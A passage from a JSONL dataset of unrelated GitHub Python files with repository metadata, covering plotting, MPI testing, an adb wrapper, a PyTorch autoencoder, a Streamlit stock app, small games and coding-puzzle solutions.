True.\r\n If true, the file name will include datetime.\r\n If false, it will not.\r\n \r\n\r\n Output\r\n ------\r\n f: file (open). Each record contains the following fields, separated by commas (csv file):\r\n - dilca: variant of Dilca, one of {\"M\", \"RR\"}\r\n - dp_method: differentially private variant of dilca, one of {'su', 'cm'}\r\n - eps: overall epsilon\r\n - sigma: sigma parameter for dilca_M\r\n - h: portion of eps to be used for context computation (only for dp_method == 'su')\r\n - i: index of the target variable\r\n - n_values: number of distinct values of variable i\r\n - pearson: pearson similarity of the distance matrices\r\n - l1_dist: l1 norm distance of the distance matrices\r\n - context: context of variable i\r\n - context_dp: differentially private context of variable i\r\n - jaccard: jaccard similarity index between context and context_dp\r\n - overlap: overlap score between context and context_dp\r\n - date: date of the test\r\n \r\n File name:{partial_name}_aaaa-mm-gg_hh.mm.ss.csv or {partial_name}_results.csv\r\n dt: datetime (as in the directory/ file name)\r\n\r\n \r\n '''\r\n\r\n \r\n dt = f\"{datetime.datetime.now()}\"\r\n if own_directory:\r\n data_path = f\"./output/_{partial_name}/\" + dt[:10] + \"_\" + dt[11:13] + \".\" + dt[14:16] + \".\" + dt[17:19] + \"/\"\r\n else:\r\n data_path = f\"./output/_{partial_name}/\"\r\n directory = os.path.dirname(data_path)\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n\r\n new = True\r\n if date:\r\n file_name = partial_name + \"_\" + dt[:10] + \"_\" + dt[11:13] + \".\" + dt[14:16] + \".\" + dt[17:19] + \".csv\"\r\n else:\r\n file_name = partial_name + '_results.csv'\r\n if os.path.isfile(data_path + file_name):\r\n if overwrite:\r\n os.remove(data_path + file_name)\r\n else:\r\n new = False\r\n \r\n \r\n f = open(data_path + file_name, \"a\",1)\r\n if new:\r\n f.write(\"dilca, dp_method, eps, sigma, h, i, n_values, pearson, l1_dist, context, context_dp, jaccard, overlap, date\\n\")\r\n\r\n return f, dt\r\n\r\n\r\n\r\ndef CreateLogger(input_level = 'INFO'):\r\n level = {'DEBUG':l.DEBUG, 'INFO':l.INFO, 'WARNING':l.WARNING, 'ERROR':l.ERROR, 'CRITICAL':l.CRITICAL}\r\n logger = l.getLogger()\r\n logger.setLevel(level[input_level])\r\n","repo_name":"elenabattaglia/dpdilca","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14805209871","text":"import os\r\n\r\nimport matplotlib.cm as cm\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom enphaseAI.utils.constants import FIGURE_DIR\r\n\r\n\r\ndef basic_plot(\r\n name: str,\r\n data: np.ndarray,\r\n labels: np.ndarray,\r\n xlabel: str = \"x\",\r\n ylabel: str = \"y\"\r\n) -> None:\r\n\r\n plt.style.use(\"ggplot\")\r\n fig, ax = plt.subplots()\r\n\r\n clusters = set(labels)\r\n num_ele = data.shape[0]\r\n num_clusters = len(clusters)\r\n\r\n ax.set_xlabel(xlabel, fontsize=15)\r\n ax.set_ylabel(ylabel, fontsize=15)\r\n ax.tick_params(labelsize=15)\r\n\r\n colors = [cm.Set1(lab + 1) for lab in labels]\r\n for i in range(num_clusters):\r\n cluster = list(clusters)[i]\r\n x = data[labels == cluster, 0]\r\n y = data[labels == cluster, 1]\r\n scatter = ax.scatter(x, y, color=np.array(colors)[labels == cluster], label=str(int(cluster)))\r\n\r\n plt.tight_layout()\r\n plt.legend()\r\n plt.savefig(os.path.join(FIGURE_DIR, name))\r\n plt.show()\r\n","repo_name":"jimleroux/enphaseai","sub_path":"enphaseAI/utils/matplotlib_plotter.py","file_name":"matplotlib_plotter.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35624478320","text":"import mpi4py\nmpi4py.rc.recv_mprobe = False\nfrom mpi4py import MPI\nimport numpy as np\nfrom sys import argv\nimport os\n\n\nif __name__ == '__main__':\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n\n if rank == 0:\n # Print all given arguments.\n print(f\"DATASET\\n=======\\nName: {argv[1]}\")\n print(\"Contains:\")\n for file in os.listdir(f\"{argv[3]}/{argv[1]}\"):\n if file.endswith(\".v\") or file.endswith(\".e\"):\n print(f\"\\t{file}\")\n\n print(\"\\nPATHS\\n=====\")\n print(f\"Playground: {argv[2]}\")\n print(f\"Data: {argv[3]}/{argv[1]}\")\n print(f\"Results: {argv[4]}\\n\\n\")\n\n # Set data for further testing.\n numData = 8\n data = np.linspace(0.0, 3.14, numData)\n else:\n numData = None\n\n numData = comm.bcast(numData, root=0)\n\n if rank != 0:\n data = np.empty(numData, dtype='d')\n\n comm.Bcast(data, root=0)\n\n print(f\"Rank: {rank}, numData: {numData}, Processorname: \" +\n f\"{MPI.Get_processor_name()}\")\n","repo_name":"OkkeVanEck/distributed_systems_lab","sub_path":"code/simulations/setup_test.py","file_name":"setup_test.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42556102599","text":"import os\nimport types\n\nfrom adb import adb_commands\nfrom adb import sign_pythonrsa\nfrom adb.adb_protocol import InvalidResponseError, InvalidCommandError\n\nfrom .base_adb import AdbInterface, AdbProxy\nfrom .log import default as logging\n\n\nclass ReadConnectError(Exception):\n pass\n\n\nclass PyAdb(AdbInterface):\n \"\"\"python-adb的封装\"\"\"\n\n @classmethod\n def get_proxy(cls, serial=None) -> AdbProxy:\n return AdbProxy(cls(serial))\n\n @staticmethod\n def my_load_rsa_key_path(file_path):\n # 原来的加载方法,在python3中问题兼容性问题\n with open(file_path + '.pub', 'rb') as f:\n pub = f.read()\n with open(file_path, 'rb') as f:\n pri = f.read()\n return sign_pythonrsa.PythonRSASigner(pub, pri)\n\n @classmethod\n def connect_dev(cls, adb_key_path, serial=None) -> adb_commands.AdbCommands:\n \"\"\"\n 连接设备,可指定连接的具体设备名\n :param adb_key_path: 与设备通讯的授权密钥\n :param serial: 可选,设备号 (可通过adb devices查看),不提供则连接第一个\n :return:\n \"\"\"\n dev = adb_commands.AdbCommands()\n try:\n dev.ConnectDevice(rsa_keys=[cls.my_load_rsa_key_path(os.path.expanduser(adb_key_path))], serial=serial)\n except InvalidCommandError as e:\n dev.Close()\n logging.warning(f'reconnect on error: {e}')\n return cls.connect_dev(adb_key_path, serial=serial)\n return dev\n\n def __init__(self, serial=None, adb_key_path='~/.android/adbkey', auto_connect=True):\n try:\n os.system('adb kill-server')\n except:\n pass\n self.serial = serial\n self.adb_key_path = adb_key_path\n self._adb = None\n if auto_connect:\n self.open_connect()\n\n @property\n def adb(self):\n if not self._adb:\n raise ValueError('Please connect device first!')\n return self._adb\n\n def get_device_serial(self) -> str:\n return self.serial\n\n def open_connect(self) -> adb_commands.AdbCommands:\n self._adb = self.connect_dev(self.adb_key_path, serial=self.serial)\n return self._adb\n\n def _on_read_error(self, e, cmd, clean_wrap, reconnect_on_err):\n if reconnect_on_err:\n logging.warning('trying to reconnect adb!')\n self.adb.Close()\n self.open_connect()\n return self.run_shell(cmd, clean_wrap, reconnect_on_err)\n else:\n raise ReadConnectError(e)\n\n def run_shell(self, cmd: str, clean_wrap=False, reconnect_on_err=True) -> str:\n \"\"\"\n 执行命令\n :param cmd: 命令内容\n :param clean_wrap: 是否清理结果换行\n :param reconnect_on_err: 命令执行过程中出现IO读写的错误时重新连接. 如果为False,则发生错误时将报错 ReadConnectError\n :return:\n \"\"\"\n logging.debug(f'adb shell {cmd}')\n try:\n rs = self.adb.Shell(cmd)\n if clean_wrap:\n rs = rs.strip()\n return rs\n except InvalidResponseError as e:\n return self._on_read_error(e, cmd, clean_wrap, reconnect_on_err)\n except InvalidCommandError as e:\n return self._on_read_error(e, cmd, clean_wrap, reconnect_on_err)\n except AttributeError as e:\n return self._on_read_error(e, cmd, clean_wrap, reconnect_on_err)\n\n def stream_shell(self, cmd: str) -> types.GeneratorType:\n \"\"\"\n 执行命令,返回输出流的迭代器,每次返回一行输出结果\n :param cmd: 命令内容\n :return: 每行输出结果迭代\n \"\"\"\n logging.debug(f'adb shell(Streaming) {cmd}')\n return self.adb.StreamingShell(cmd)\n\n def install_app(self, apk_path):\n return self.adb.Install(apk_path, grant_permissions=True, timeout_ms=1200000)\n\n def uninstall_app(self, app_bundle: str):\n return self.adb.Uninstall(app_bundle)\n\n def close(self):\n try:\n self.adb.Close()\n except:\n pass\n\n def push_file(self, local_path: str, device_path: str):\n return self.adb.Push(local_path, device_path)\n\n def pull_file(self, device_path: str, local_path: str):\n return self.adb.Pull(device_path, local_path)\n\n def devices(self):\n # 这里有坑,已经连接了设备的话,执行Devices 方法会报错,必须先断开连接\n logging.warning('listing devices need to disconnect current device!')\n self.close()\n return [(x.serial_number, '') for x in self._devices()]\n\n @staticmethod\n def _devices():\n # 请在连接设备前调用,否则会报错 # usb1.USBErrorAccess: LIBUSB_ERROR_ACCESS [-3]\n return adb_commands.AdbCommands.Devices()\n","repo_name":"nic562/AndroidPerf","sub_path":"android_perf/py_adb.py","file_name":"py_adb.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12256666167","text":"#!/usr/bin/env python3\n\nimport os\nimport copy\nimport torch\nimport os.path\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import models\nimport torch.utils.data as Data\n\n\ndef encoder(model):\n models = {'vgg': VGG,\n 'resnet': ResNet,\n 'mobilenet': MobileNetV2}\n Model = models[model]\n return Model()\n\n\nclass AutoEncoder(nn.Module):\n def __init__(self, model='vgg'):\n super().__init__()\n self.encoder = encoder(model)\n self.decoder = Decoder()\n\n def forward(self, x):\n coding = self.encoder(x)\n output = self.decoder(coding)\n return output\n\n\nclass VGG(models.VGG):\n def __init__(self, pretrained=True, requires_grad=True, remove_fc=True, show_params=False):\n super().__init__(models.vgg16().features)\n\n if pretrained:\n self.load_state_dict(models.vgg16(pretrained=True).state_dict())\n\n if not requires_grad:\n for param in super().parameters():\n param.requires_grad = False\n\n if remove_fc:\n del self.classifier\n\n if show_params:\n for name, param in self.named_parameters():\n print(name, param.size())\n\n def forward(self, x):\n x = self.features(x)\n return x\n\n\nclass ResNet(models.ResNet):\n def __init__(self, pretrained=True, requires_grad=True, remove_fc=True, show_params=False):\n super().__init__(block=models.resnet.BasicBlock, layers=[2, 2, 2, 2])\n\n if pretrained:\n self.load_state_dict(models.resnet18(pretrained=True).state_dict())\n\n if not requires_grad:\n for param in super().parameters():\n param.requires_grad = False\n\n if remove_fc:\n del self.fc\n\n if show_params:\n for name, param in self.named_parameters():\n print(name, param.size())\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n return x\n\n\nclass MobileNetV2(models.MobileNetV2):\n def __init__(self, pretrained=True, requires_grad=True, remove_fc=True, show_params=False):\n super().__init__()\n\n if pretrained:\n self.load_state_dict(models.mobilenet_v2(pretrained=True).state_dict())\n\n if not requires_grad:\n for param in super().parameters():\n param.requires_grad = False\n\n if remove_fc:\n del self.classifier\n\n if show_params:\n for name, param in self.named_parameters():\n print(name, param.size())\n\n def forward(self, x):\n return self.features(x)\n\n\nclass Decoder(nn.Module):\n def __init__(self, in_channels=512): # Use 1280 for MobileNetV2\n super().__init__()\n self.relu = nn.ReLU(inplace=True)\n self.deconv1 = nn.ConvTranspose2d(in_channels, 512, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn1 = nn.BatchNorm2d(512)\n self.deconv2 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn2 = nn.BatchNorm2d(256)\n self.deconv3 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n self.deconv4 = nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn4 = nn.BatchNorm2d(64)\n self.deconv5 = nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1, dilation=1, output_padding=1)\n self.bn5 = nn.BatchNorm2d(32)\n self.classifier = nn.Conv2d(32, 3, kernel_size=1)\n\n def forward(self, x):\n x = self.bn1(self.relu(self.deconv1(x))) # size=(N, 512, x.H/16, x.W/16)\n x = self.bn2(self.relu(self.deconv2(x))) # size=(N, 256, x.H/8, x.W/8)\n x = self.bn3(self.relu(self.deconv3(x))) # size=(N, 128, x.H/4, x.W/4)\n x = self.bn4(self.relu(self.deconv4(x))) # size=(N, 64, x.H/2, x.W/2)\n x = self.bn5(self.relu(self.deconv5(x))) # size=(N, 32, x.H, x.W)\n x = self.classifier(x) # size=(N, n_class, x.H/1, x.W/1)\n return x # size=(N, n_class, x.H/1, x.W/1)\n\n\nif __name__ == \"__main__\":\n from dataset import SubTF\n from torchutil import show_batch\n import torchvision.transforms as transforms\n\n transform = transforms.Compose([\n transforms.CenterCrop(tuple([320, 320])),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n data = SubTF(root='/data/datasets', train=True, transform=transform)\n loader = Data.DataLoader(dataset=data, batch_size=1, shuffle=True)\n\n net, best_loss = torch.load('saves/resnet.pt')\n\n with torch.no_grad():\n for batch_idx, inputs in enumerate(loader):\n if torch.cuda.is_available():\n inputs = inputs.cuda()\n outputs = net(inputs)\n show_batch(torch.cat([inputs, outputs], dim=0), name='test', waitkey=1000)\n","repo_name":"sair-lab/interestingness","sub_path":"autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"39146296259","text":"import random\n\n\ndef jogar():\n asterisco = \"******************************************\"\n bem_vindo = \" Bem vindo ao jogo da Forca \"\n\n print(asterisco)\n print(bem_vindo)\n print(asterisco)\n\n secreta = {\"banana\", \"pera\", \"abacate\", \"limao\", \"açai\", \"morango\", \"manga\", \"laranja\"}\n palavra_secreta = random.choice(list(secreta))\n tentativa = len(palavra_secreta)\n palavra = \"\"\n\n enforcou = False\n acertou = False\n frase = \"\"\n tentativa = 1\n fim_jogo = \"FIM DE JOGO\"\n total = 1\n\n print(\"A palavra tem {} caractere {}\".format(len(palavra_secreta), str(contadorSegredor(palavra_secreta))))\n print(\"\\nVocê tem {} TENTATIVAS\".format(6))\n\n # Enquanto não enforcou e não acertou\n while not enforcou and not acertou:\n print(\"\")\n print(asterisco)\n chute = input(str(\"Digite uma letra: \\n\"))\n chute = chute.lower()\n contador = 0\n if palavra_secreta.__contains__(chute):\n for letra in palavra_secreta:\n if len(palavra) == len(palavra_secreta):\n if palavra.__contains__(letra):\n print(letra.upper(), end=\"\")\n frase = frase + letra\n contador += len(letra)\n elif palavra_secreta[contador].__contains__(chute):\n print(letra.upper(), end=\"\")\n frase = frase + letra\n contador += len(letra)\n elif palavra[contador] == letra:\n frase = frase + letra\n print(letra.upper(), end=\"\")\n else:\n print(\"_\", end=\"\")\n frase = frase + \"_\"\n contador += len(letra)\n if len(palavra) < len(palavra_secreta):\n if chute == letra:\n if len(palavra) != len(palavra_secreta):\n print(letra.upper(), end=\"\")\n frase = frase + letra\n palavra = palavra + chute\n contador += len(letra)\n else:\n print(\"_\", end=\"\")\n palavra = palavra + \"_\"\n frase = frase + \"_\"\n contador += len(letra)\n palavra = frase\n frase = \"\"\n print(\"\\nVocê tem {} TENTATIVAS\".format(total))\n print(\"Número de ERROS Nº:{}\".format(tentativa - 1))\n else:\n total = str(6 - tentativa)\n print(\"\\nVocê tem {} TENTATIVAS\".format(total))\n tentativa = tentativa + 1\n print(\"Número de ERROS Nº:{}\".format(tentativa - 1))\n while tentativa == 7:\n print(palavra)\n enforcou = True\n acertou = True\n break\n\n if palavra == palavra_secreta:\n acertou = True\n print(asterisco)\n print(\"\\nPARABÉNS!!!!! \\nVOCÊ GANHOU!!!!!! \\n\")\n print(asterisco)\n\n print(\"Palavra SECRETA era: {}\".format(palavra_secreta).upper())\n print(fim_jogo)\n print(asterisco)\n\n\ndef contadorSegredor(palavra: str):\n tamanho = \"\"\n for contador in palavra:\n tamanho = tamanho + \"_\"\n\n return tamanho\n\n\n# Star da aplicação\nif (__name__ == \"__main__\"):\n jogar()\n","repo_name":"marciliodevjava/curso-python","sub_path":"Curso-de-python-comecando-com-a-linguagem/jogo/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14985881030","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, r: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n mi=min(p.val,q.val)\n ma=max(p.val,q.val)\n while r!=None:\n if(mir.val and ma>r.val):\n r=r.right\n else:\n break\n return r","repo_name":"Anushree1291/Leetcode-solutions","sub_path":"0235-lowest-common-ancestor-of-a-binary-search-tree/0235-lowest-common-ancestor-of-a-binary-search-tree.py","file_name":"0235-lowest-common-ancestor-of-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74907279209","text":"import setuptools\n\nwith open('README.md', 'r', encoding='utf-8') as fh:\n long_description = fh.read()\n\ntests_require = [\n 'pytest'\n]\n\nsetuptools.setup(\n name='pyedi',\n version='1.0.0',\n author='Anton Samuelsson',\n author_email='samuelsson.anton@gmail.com',\n description='A lightweight EDI file parser',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/freestream/pyedi',\n classifiers=[\n 'Programming Language :: Python :: 3.9',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n ],\n tests_require=tests_require,\n packages=setuptools.find_packages(),\n python_requires='>=3.9',\n)\n","repo_name":"freestream/pyedi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"970496790","text":"import os, sys\nimport numpy as np\nimport tensorflow as tf\nimport SimpleITK as sitk\nfrom skimage.transform import resize\n\nimport calculon.utils.log as log\nfrom calculon.utils.validoptions import ValidOption\nfrom calculon.utils.image_utils import create_mask, standardize_volume, read_nifti_file, read_dicom_series\nfrom calculon.models.model_utils import dice_coef, dice_coef_loss\n\nclass Inference:\n ''' Class for the inference of segmenting lung CTs\n\n\n '''\n default_options = {\n 'path_to_data':\n ValidOption(\n type=str,\n default='./',\n help='Path to data to be tested.'),\n 'path_to_savedmodel':\n ValidOption(\n type=str,\n default='./',\n help='Path to pretrained tensorflow model.'),\n 'image_shape_resize':\n ValidOption(\n type=list,\n subtype=int,\n default=[128, 128, 128],\n help='Resize image to this height when training'),\n 'num_classes':\n ValidOption(\n type=int,\n default=2,\n help='Number of classes to predict into')\n }\n\n @classmethod\n def from_options(cls, options):\n ''' Create tester from options dictionary\n\n Args:\n options (dict): Dictionary with all necessary options\n\n Returns:\n Tester: Tester object\n\n '''\n\n output_dir = options['output_dir']\n path_to_data = options['inference']['path_to_data']\n path_to_savedmodel = options['inference']['path_to_savedmodel']\n image_shape_resize = options['inference']['image_shape_resize']\n num_classes = options['inference']['num_classes']\n return cls(output_dir, path_to_data, path_to_savedmodel, \n image_shape_resize, num_classes)\n\n def __init__(self, output_dir, path_to_data, path_to_savedmodel, \n image_shape_resize, num_classes):\n '''Initialize the segmentation.\n \n Args:\n output_dir (str): Path to output directory.\n path_to_data (str): Path to lung CT image to be segmented.\n path_to_savedmodel (str): Path to saved model directory.\n image_shape_resize (array): Shape of image to be resized when segmenting.\n num_classes (int): Number of classes to segment into. Binary segmentation: num_classes=2.\n '''\n\n self.output_dir = output_dir\n self.path_to_data = path_to_data\n self.path_to_savedmodel = path_to_savedmodel\n self.image_shape_resize = image_shape_resize\n self.num_classes = num_classes\n \n def _preprocess(self, image):\n '''Preprocess an image to be segmented.\n \n Args:\n image (array): Image array to be preprocessed.\n \n Returns:\n array: Preprocessed image\n '''\n # Resize to new shape\n image = resize(image, self.image_shape_resize, mode='constant', order=1, preserve_range=True, anti_aliasing=False) # bi-linear\n \n # Clip values to -1024 HU and 600 HU\n image = np.clip(image, a_min=-1024, a_max=600)\n\n # Standardize data with mean = 0 and std. = 1\n image = standardize_volume(image)\n\n # Expand dims\n image = tf.expand_dims(image, axis=0, name=None)\n image = tf.expand_dims(image, axis=-1, name=None)\n return image\n\n def _load_model(self):\n '''Recreates the same tf.model\n \n Returns:\n tf.model: A compiled tf.model\n '''\n model = tf.keras.models.load_model(self.path_to_savedmodel, custom_objects = { 'dice_coef_loss': dice_coef_loss, 'dice_coef': dice_coef },compile=False)\n model.compile( loss = dice_coef_loss, optimizer = tf.keras.optimizers.Adam())\n return model\n \n def predict(self, image, model):\n '''Takes an image and a model and predicts the segmentation mask.\n \n Args:\n image (array): Image to be predicted on.\n model (tf.model): Tensorflow model to be predicted on.\n \n Returns:\n array: Mask array.\n '''\n # Get the original shape\n orig_shape = image.shape\n \n # Preprocess\n image = self._preprocess(image)\n\n # Predict\n pred_mask = model.predict(image)\n\n # Argmax over the classes and remove last dim\n mask = create_mask(pred_mask)\n mask = tf.squeeze(mask, axis=-1)\n\n # Transform to numpy array\n mask = tf.make_tensor_proto(mask)\n mask = tf.make_ndarray(mask)\n\n # Resize to original shape\n mask = resize(mask, output_shape=orig_shape, mode='constant', order=0, preserve_range=True, anti_aliasing=False) # order = 0: nearest neighbor\n return mask\n \n def _create_output_filename(self):\n '''Creates a output mask filename based on the CT basename, e.g. pat01_mask.nii.gz\n '''\n basename = os.path.basename(self.path_to_data)\n basename = os.path.splitext(basename)[0]\n outputfilename = os.path.join(self.output_dir, basename + '_mask.nii.gz')\n return outputfilename\n\n def write_image(self, image):\n '''Writes an image with SITK.\n \n Args:\n image (array): Image array.\n '''\n outputImageFileName = self._create_output_filename()\n sitk_image = sitk.GetImageFromArray(image)\n sitk.WriteImage(sitk_image, outputImageFileName)\n print('Segmentation written to:', outputImageFileName)\n\n def execute(self):\n '''Execute the inference process.\n '''\n model = self._load_model()\n image = read_nifti_file(self.path_to_data)\n mask = self.predict(image, model)\n self.write_image(mask)","repo_name":"jbi35/seg_training","sub_path":"inference/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18251688983","text":"'''\nTitle : 세 수 고르기\nLevel : S3\nProblem : M개의 자연수로 이루어진 집합 S와 자연수 N\n S에 속하지 않는 자연수 x,y,z를 골라 |N-xyz|의 최솟값을 구한다.\nType : 완전탐색\nIdea : 1. N의 최대범위는 1000이므로 확인할 x,y,z의 범위는 1001까지 하면된다.\n 1-1. x,y,z는 1000을 넘겨도 상관없으나, 1001 이상으로 확인할 필요는 없다.\n 1-2. x*y*1002 이상 될 경우 그 값보다 |N-xyz|이 작을 경우가 없다.\n'''\nimport math\n\nN, M = map(int, input().split())\nS = list(map(int, input().split()))\ne = [False] * 1002#안 되는 수 : 1 ~ 1000\nfor s in S:\n e[s] = True\n\nans = math.inf\nfor x in range(1, 1001):\n if e[x] is True:\n continue\n for y in range(x, 1001):\n if e[y] is True:\n continue\n for z in range(y, 1002):\n if e[z] is True:\n continue\n ans = min(ans, abs(N-x*y*z))\nprint(ans)\n","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/2021/Nov/25/1503.py","file_name":"1503.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74742873766","text":"import streamlit as st\nimport pandas as pd\nimport yfinance as yf\nfrom datetime import date, timedelta\n\nst.title('Trend Analysis Web App')\n\nticker_input = st.text_input(\"Enter Tickers (i.e.: GS, MSFT, AAPL)\", 'GS, MSFT, AAPL')\n\nperiod = st.text_input(\"Enter Period (valid periods: 1d,5d,1mo,3mo,6mo,1y,2y,5y,10y,ytd,max)\", '1d')\n\n# st.write(f\"ticker inputs: {ticker_input}\")\n# st.write(f\"period to extract: {period}\")\n\n@st.cache\ndef get_ticker_data(tickers = None, period = None):\n assert tickers is not None\n assert period is not None\n\n tickers = [t.strip() for t in tickers.split(',')]\n tickers_df = yf.download(tickers=tickers, period=period)\n tickers_df = tickers_df.stack().reset_index().rename(columns={'level_1':'Ticker'})\n\n return tickers_df\n\ndf = get_ticker_data(tickers = ticker_input, period = period)\n\nst.write(df)\n\n@st.cache\ndef convert_df(df):\n # IMPORTANT: Cache the conversion to prevent computation on every rerun\n return df.to_csv().encode('utf-8')\n\n\ncsv = convert_df(df)\n\nst.download_button(\n label=\"Download data as CSV\",\n data=csv,\n file_name='data.csv',\n mime='text/csv',\n)","repo_name":"escott8908/trend_analysis","sub_path":"trend_analysis_app.py","file_name":"trend_analysis_app.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27647748753","text":"import os, json, logging\nfrom .DbManager import DbManager\n\nclass DataDisplayer:\n def __init__(self, configurations):\n self.configurations = configurations\n\n def display(self,):\n logging.info('Starting the displaying of data')\n self.display_all()\n self.display_gender_stats()\n\n def display_all(self):\n profiles = []\n with DbManager(self.configurations) as db_manager:\n profiles = db_manager.get_profiles()\n\n message = \"Total number of profiles: \" + str(len(profiles))\n logging.info(message)\n print(message)\n\n for current_profile in profiles:\n message = current_profile.formatted()\n logging.info(message)\n print(message)\n\n def display_gender_stats(self):\n profiles = []\n with DbManager(self.configurations) as db_manager:\n gender_data = db_manager.get_gender_totals()\n message = \"Total of females: \" + str(gender_data['female']) + \" males: \" + str(gender_data['male']) + \" and undefined: \" + str(gender_data['undefined'])\n logging.info(message)\n print(message)\n\n proportion_female = str(round(gender_data['female'] * 100 / gender_data['total'], 1))\n proportion_male = str(round(gender_data['male'] * 100 / gender_data['total'], 1))\n proportion_undefined = str(round(gender_data['undefined'] * 100 / gender_data['total'], 1))\n\n message = \"Proportion of females: \" + proportion_female + \" males: \" + proportion_male + \" and undefined: \" + proportion_undefined\n logging.info(message)\n print(message)\n\n unnacounted = gender_data['female'] + gender_data['male'] + gender_data['undefined'] - gender_data['total']\n if unnacounted != 0:\n message = \"There are \" + unnacounted + \" profiles with an invalid gender\"\n logging.info(message)\n print(message)\n","repo_name":"msscelo/linkedin-report","sub_path":"classes/DataDisplayer.py","file_name":"DataDisplayer.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40637104978","text":"num1 = [5, 10, 15]\nnum2 = [10, 15]\n\nnum3 = [5, 10, 15]\nnum4 = num2[:]\n\n\nfor val in num1:\n\tif val in num2:\n\t\tnum1.remove(val)\n\nprint(num1)\n\nfor val in num3[:]:\n\tif val in num4:\n\t\tnum3.remove(val)\n\nprint(num3)\n\n","repo_name":"davidseungjin/Python","sub_path":"ch0807_2.py","file_name":"ch0807_2.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27967724252","text":"\n\nimport sys\nfrom PyQt5 import QtWidgets, QtCore\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QObject, pyqtSlot\nfrom PyQt5 import QtGui\n\n\ndef qt_message_handler(mode, context, message):\n if mode == QtCore.QtInfoMsg:\n mode = 'INFO'\n elif mode == QtCore.QtWarningMsg:\n mode = 'WARNING'\n elif mode == QtCore.QtCriticalMsg:\n mode = 'CRITICAL'\n elif mode == QtCore.QtFatalMsg:\n mode = 'FATAL'\n else:\n mode = 'DEBUG'\n print('qt_message_handler: line: %d, func: %s(), file: %s' % (\n context.line, context.function, context.file))\n print(' %s: %s\\n' % (mode, message))\n\n\n\n\n\n # -*- coding: UTF-8 -*-\nimport sys\nimport time\nfrom PyQt5 import QtWidgets\ndef on_clicked():\n\n button.setEnabled(False)\n QtWidgets.QApplication.processEvents()\n for i in range(1000000000):\n print(i**3)\n # time.sleep(1)\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n window = QtWidgets.QWidget()\n button = QtWidgets.QPushButton('Button')\n button.clicked.connect(on_clicked)\n box = QtWidgets.QHBoxLayout()\n box.addWidget(button)\n window.setLayout(box)\n window.show()\n sys.exit(app.exec_())\n","repo_name":"zaswed76/pc_club","sub_path":"club_stat/exemple/gui/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12677516712","text":"def pytest_configure( config ):\n # One of PyTest's nanny features is to redirect stdin to a thing that refuses to be read\n # from. It is supposed to prevent tests from accidentally getting blocked waiting for user\n # input. I have never in my life had a test that blocked on stdin without it being completely\n # obvious, even without this nanny redirect. However, I've repeatedly run into issues where\n # this redirection gets in the way, mainly with Fabric:\n #\n # http://jenkins.cgcloud.info/job/cgcloud/304/testReport/junit/src.cgcloud.core.test.test_core/CoreTests/test_generic_fedora_22_box/\n #\n # This workaround disables that nanny feature.\n capman = 